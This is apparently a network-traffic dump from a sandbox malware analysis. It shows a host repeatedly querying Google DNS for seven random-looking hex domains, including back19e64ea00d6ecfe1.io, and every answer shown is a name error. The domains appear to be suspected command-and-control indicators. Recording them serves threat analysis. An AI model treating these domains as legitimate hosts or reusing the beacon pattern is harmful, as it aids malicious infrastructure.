Apr 12, 2021 13:15:58.165599108 CEST	53	61760	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:58.264441013 CEST	63822	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:58.339704037 CEST	53	63822	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:58.440078020 CEST	50957	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:58.497509956 CEST	53	50957	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:58.710973024 CEST	59666	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:58.762681007 CEST	53	59666	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:58.931849003 CEST	52223	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:58.991841078 CEST	53	52223	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:59.145524025 CEST	60136	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:59.195682049 CEST	53	60136	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:00.065006971 CEST	55649	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:00.124286890 CEST	53	55649	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:00.252777100 CEST	51524	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:00.311846018 CEST	53	51524	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:00.885868073 CEST	59141	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:00.947918892 CEST	53	59141	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:01.427527905 CEST	49682	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:01.454703093 CEST	49709	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:01.484962940 CEST	53	49682	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:01.520229101 CEST	53	49709	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:02.753659964 CEST	59384	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:02.865478992 CEST	53	59384	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:03.600631952 CEST	50284	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:03.646398067 CEST	53089	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:03.651181936 CEST	53	50284	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:03.707947016 CEST	53	53089	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:04.249996901 CEST	50563	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:04.299060106 CEST	53	50563	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:04.683182001 CEST	50265	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:04.731848001 CEST	53	50265	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:05.060820103 CEST	55442	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:05.120223045 CEST	53	55442	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:05.897744894 CEST	49561	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:05.946475983 CEST	53	49561	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:05.946624994 CEST	54097	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:06.006445885 CEST	53	54097	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:06.451786995 CEST	59502	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:06.509097099 CEST	53	59502	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:06.885490894 CEST	57959	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:06.936474085 CEST	53	57959	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:07.953996897 CEST	54971	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:08.004420042 CEST	53	54971	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:09.226746082 CEST	50969	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:09.278500080 CEST	53	50969	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:13.320231915 CEST	52183	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:13.381257057 CEST	53	52183	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:25.368834019 CEST	63354	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:25.419250965 CEST	53	63354	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:28.156022072 CEST	50635	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:28.207494020 CEST	53	50635	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:40.433587074 CEST	61603	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:40.494195938 CEST	53	61603	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:45.856260061 CEST	58318	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:45.929464102 CEST	53	58318	8.8.8.8	192.168.2.6
Apr 12, 2021 13:16:47.956224918 CEST	60826	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:16:48.031744003 CEST	53	60826	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 13:15:14.377513885 CEST	192.168.2.6	8.8.8.8	0x68ea	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.450926065 CEST	192.168.2.6	8.8.8.8	0xc1f	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.525068045 CEST	192.168.2.6	8.8.8.8	0x762e	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.589874983 CEST	192.168.2.6	8.8.8.8	0xa47a	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.660587072 CEST	192.168.2.6	8.8.8.8	0x4196	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.815713882 CEST	192.168.2.6	8.8.8.8	0xd2f1	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.902801037 CEST	192.168.2.6	8.8.8.8	0xeb29	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.091698885 CEST	192.168.2.6	8.8.8.8	0x32a1	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.159184933 CEST	192.168.2.6	8.8.8.8	0x2553	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.324261904 CEST	192.168.2.6	8.8.8.8	0x672c	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.391724110 CEST	192.168.2.6	8.8.8.8	0x1df0	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.471811056 CEST	192.168.2.6	8.8.8.8	0xfa93	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.556051970 CEST	192.168.2.6	8.8.8.8	0x940d	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.624927044 CEST	192.168.2.6	8.8.8.8	0xaa0f	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.883393049 CEST	192.168.2.6	8.8.8.8	0x6df6	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.950357914 CEST	192.168.2.6	8.8.8.8	0x1959	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.007472992 CEST	192.168.2.6	8.8.8.8	0xe4ba	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.063611984 CEST	192.168.2.6	8.8.8.8	0xaa19	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.126163960 CEST	192.168.2.6	8.8.8.8	0xfe2a	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.201939106 CEST	192.168.2.6	8.8.8.8	0x41f2	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.286492109 CEST	192.168.2.6	8.8.8.8	0xe7a8	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.495150089 CEST	192.168.2.6	8.8.8.8	0xb1ae	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.618143082 CEST	192.168.2.6	8.8.8.8	0xa3f	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.758435011 CEST	192.168.2.6	8.8.8.8	0xaf52	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.040222883 CEST	192.168.2.6	8.8.8.8	0xa9af	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.308532953 CEST	192.168.2.6	8.8.8.8	0x1ed5	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.448554993 CEST	192.168.2.6	8.8.8.8	0x46dd	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.650157928 CEST	192.168.2.6	8.8.8.8	0xde3b	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.529341936 CEST	192.168.2.6	8.8.8.8	0xc9a4	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.612606049 CEST	192.168.2.6	8.8.8.8	0x1113	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.669120073 CEST	192.168.2.6	8.8.8.8	0xa6d1	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.733589888 CEST	192.168.2.6	8.8.8.8	0xeeec	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.801429033 CEST	192.168.2.6	8.8.8.8	0xb592	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.869898081 CEST	192.168.2.6	8.8.8.8	0x49a6	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.937189102 CEST	192.168.2.6	8.8.8.8	0x16f1	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.574523926 CEST	192.168.2.6	8.8.8.8	0xca1a	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.662971973 CEST	192.168.2.6	8.8.8.8	0x961c	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.744008064 CEST	192.168.2.6	8.8.8.8	0x69f0	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.961246014 CEST	192.168.2.6	8.8.8.8	0xaffc	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.082461119 CEST	192.168.2.6	8.8.8.8	0x5a0	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.139319897 CEST	192.168.2.6	8.8.8.8	0x6519	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.194757938 CEST	192.168.2.6	8.8.8.8	0x1ba8	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.193100929 CEST	192.168.2.6	8.8.8.8	0xca8b	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.258804083 CEST	192.168.2.6	8.8.8.8	0xbe50	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.322952986 CEST	192.168.2.6	8.8.8.8	0x1ae2	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.415589094 CEST	192.168.2.6	8.8.8.8	0xd1c1	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.495362997 CEST	192.168.2.6	8.8.8.8	0x2594	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.563915014 CEST	192.168.2.6	8.8.8.8	0x373e	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.622380018 CEST	192.168.2.6	8.8.8.8	0x1ef2	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.500628948 CEST	192.168.2.6	8.8.8.8	0x8486	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.558604002 CEST	192.168.2.6	8.8.8.8	0x21dd	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.632806063 CEST	192.168.2.6	8.8.8.8	0xe6b9	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.696170092 CEST	192.168.2.6	8.8.8.8	0xfd9f	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.764345884 CEST	192.168.2.6	8.8.8.8	0xeba4	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.838165998 CEST	192.168.2.6	8.8.8.8	0xbe1a	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.979769945 CEST	192.168.2.6	8.8.8.8	0x4d5a	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.055459976 CEST	192.168.2.6	8.8.8.8	0xe43	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.129462957 CEST	192.168.2.6	8.8.8.8	0x8c84	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.199481964 CEST	192.168.2.6	8.8.8.8	0xef61	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.295160055 CEST	192.168.2.6	8.8.8.8	0xc7b0	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.361999035 CEST	192.168.2.6	8.8.8.8	0xfaae	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.432769060 CEST	192.168.2.6	8.8.8.8	0xae05	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.504848957 CEST	192.168.2.6	8.8.8.8	0xae59	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.079602957 CEST	192.168.2.6	8.8.8.8	0x6e94	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.145359993 CEST	192.168.2.6	8.8.8.8	0x6559	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.205358028 CEST	192.168.2.6	8.8.8.8	0xdf75	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.275417089 CEST	192.168.2.6	8.8.8.8	0x1e3d	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.349136114 CEST	192.168.2.6	8.8.8.8	0xdedb	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.420001984 CEST	192.168.2.6	8.8.8.8	0xb121	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.497481108 CEST	192.168.2.6	8.8.8.8	0x9271	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.598592997 CEST	192.168.2.6	8.8.8.8	0xdc3c	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.660948038 CEST	192.168.2.6	8.8.8.8	0x31fa	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.735624075 CEST	192.168.2.6	8.8.8.8	0xe900	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.807276011 CEST	192.168.2.6	8.8.8.8	0x7a90	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.880134106 CEST	192.168.2.6	8.8.8.8	0x8391	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.945940018 CEST	192.168.2.6	8.8.8.8	0x192b	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.013783932 CEST	192.168.2.6	8.8.8.8	0x7820	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.077974081 CEST	192.168.2.6	8.8.8.8	0x7a3	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.165466070 CEST	192.168.2.6	8.8.8.8	0x935c	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.228888988 CEST	192.168.2.6	8.8.8.8	0x9b26	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.298808098 CEST	192.168.2.6	8.8.8.8	0x78e9	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.371790886 CEST	192.168.2.6	8.8.8.8	0xad6b	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.455920935 CEST	192.168.2.6	8.8.8.8	0xee73	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.522313118 CEST	192.168.2.6	8.8.8.8	0xe6cb	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.648303032 CEST	192.168.2.6	8.8.8.8	0x3419	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.716878891 CEST	192.168.2.6	8.8.8.8	0x297a	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.775183916 CEST	192.168.2.6	8.8.8.8	0xd191	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.830224037 CEST	192.168.2.6	8.8.8.8	0x687	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.891655922 CEST	192.168.2.6	8.8.8.8	0xc272	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.952944040 CEST	192.168.2.6	8.8.8.8	0xb709	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:52.018667936 CEST	192.168.2.6	8.8.8.8	0x435b	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:57.932301044 CEST	192.168.2.6	8.8.8.8	0x4f7d	Standard query (0)	9ED2FEEA30C3CC5D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.108226061 CEST	192.168.2.6	8.8.8.8	0xfe94	Standard query (0)	55BE681FC6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.264441013 CEST	192.168.2.6	8.8.8.8	0x6677	Standard query (0)	61D53B5A4BC1AB86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.440078020 CEST	192.168.2.6	8.8.8.8	0x997c	Standard query (0)	C431A802FF4A46B5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.710973024 CEST	192.168.2.6	8.8.8.8	0x1d44	Standard query (0)	84B5A35D6E5335EF.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:59.145524025 CEST	192.168.2.6	8.8.8.8	0xe2be	Standard query (0)	BDC347C728B2D94D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:16:00.065006971 CEST	192.168.2.6	8.8.8.8	0xce51	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 13:15:14.437091112 CEST	8.8.8.8	192.168.2.6	0x68ea	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.511521101 CEST	8.8.8.8	192.168.2.6	0xc1f	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.575675964 CEST	8.8.8.8	192.168.2.6	0x762e	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.649498940 CEST	8.8.8.8	192.168.2.6	0xa47a	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.808012009 CEST	8.8.8.8	192.168.2.6	0x4196	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:14.890281916 CEST	8.8.8.8	192.168.2.6	0xd2f1	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.073606968 CEST	8.8.8.8	192.168.2.6	0xeb29	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.151166916 CEST	8.8.8.8	192.168.2.6	0x32a1	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.304997921 CEST	8.8.8.8	192.168.2.6	0x2553	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.382364988 CEST	8.8.8.8	192.168.2.6	0x672c	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.451457024 CEST	8.8.8.8	192.168.2.6	0x1df0	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.546252012 CEST	8.8.8.8	192.168.2.6	0xfa93	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.616929054 CEST	8.8.8.8	192.168.2.6	0x940d	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.684731960 CEST	8.8.8.8	192.168.2.6	0xaa0f	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:15.943239927 CEST	8.8.8.8	192.168.2.6	0x6df6	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.001530886 CEST	8.8.8.8	192.168.2.6	0x1959	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.056565046 CEST	8.8.8.8	192.168.2.6	0xe4ba	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.112196922 CEST	8.8.8.8	192.168.2.6	0xaa19	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.185563087 CEST	8.8.8.8	192.168.2.6	0xfe2a	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.279423952 CEST	8.8.8.8	192.168.2.6	0x41f2	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:16.344163895 CEST	8.8.8.8	192.168.2.6	0xe7a8	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.556648970 CEST	8.8.8.8	192.168.2.6	0xb1ae	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.669631958 CEST	8.8.8.8	192.168.2.6	0xa3f	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:18.834914923 CEST	8.8.8.8	192.168.2.6	0xaf52	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.089245081 CEST	8.8.8.8	192.168.2.6	0xa9af	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.369549036 CEST	8.8.8.8	192.168.2.6	0x1ed5	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.508394003 CEST	8.8.8.8	192.168.2.6	0x46dd	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:19.710432053 CEST	8.8.8.8	192.168.2.6	0xde3b	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.590101004 CEST	8.8.8.8	192.168.2.6	0xc9a4	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.661261082 CEST	8.8.8.8	192.168.2.6	0x1113	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.720638037 CEST	8.8.8.8	192.168.2.6	0xa6d1	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.793107033 CEST	8.8.8.8	192.168.2.6	0xeeec	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.860833883 CEST	8.8.8.8	192.168.2.6	0xb592	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.927268982 CEST	8.8.8.8	192.168.2.6	0x49a6	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:22.996838093 CEST	8.8.8.8	192.168.2.6	0x16f1	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.647490025 CEST	8.8.8.8	192.168.2.6	0xca1a	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.720684052 CEST	8.8.8.8	192.168.2.6	0x961c	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:23.801461935 CEST	8.8.8.8	192.168.2.6	0x69f0	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.018718958 CEST	8.8.8.8	192.168.2.6	0xaffc	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.132764101 CEST	8.8.8.8	192.168.2.6	0x5a0	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.187997103 CEST	8.8.8.8	192.168.2.6	0x6519	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:24.256973028 CEST	8.8.8.8	192.168.2.6	0x1ba8	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.250489950 CEST	8.8.8.8	192.168.2.6	0xca8b	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.316061974 CEST	8.8.8.8	192.168.2.6	0xbe50	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.383675098 CEST	8.8.8.8	192.168.2.6	0x1ae2	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.476651907 CEST	8.8.8.8	192.168.2.6	0xd1c1	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
